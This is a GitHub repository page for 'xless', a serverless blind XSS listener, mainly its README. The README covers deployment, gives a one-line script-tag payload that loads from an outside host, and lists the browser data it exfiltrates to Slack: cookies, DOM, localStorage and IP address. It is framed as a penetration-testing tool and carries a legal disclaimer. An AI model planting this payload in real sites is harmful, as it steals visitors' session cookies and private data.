The Serverless Blind XSS App
Branch: master
Clone or download
Latest commit d726f6b Feb 10, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore Initial release. Jan 29, 2019
.nowignore Initial release. Jan 29, 2019
README.md Updated README.md Feb 10, 2019
deploy.sh Initial release. Jan 29, 2019
index.js Initial release. Jan 29, 2019
now.json Initial release. Jan 29, 2019
package.json Initial release. Jan 29, 2019
payload.js Initial release. Jan 29, 2019
test.payload.js Initial release. Jan 29, 2019

README.md

XLESS

The Serverless Blind XSS App

About The Project

xless is a serverless blind XSS app that can be used to identify blind XSS vulnerabilities using your own deployed version of the app. There is no need to run a full deployment process; just setup a zeit.co account and run bash deploy.sh. That's it. You have a fully-running Blind XSS listener that uses Slack to notify you for blind XSS callbacks.

Requirements

  • zeit.co account: Zeit provides free plan for serverless. If you use another provider for serverless, code changes should be minimal.
  • Slack Incoming Webhook URL.

Deployment

  1. Run:
$ bash deploy.sh

> Deploying ~/xless under X
> https://xless.now.sh [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
  1. Use the URL for blind XSS testing 🔥

Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.

Example Payload

<script src="https://xless.now.sh"></script>

Demo

Demo

Collected Data

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address

Contribution

Contribution is very welcome. Please share your ideas by Github issues and pull requests.

Here are some ideas to start with:

  1. Enabling sharing of page screenshot - Check test.payload.js.
  2. A nice logo design!
  3. Your idea of a new feature?

Acknowledgement

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of xless for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is currently licensed under MIT License.

Author

Mazin Ahmed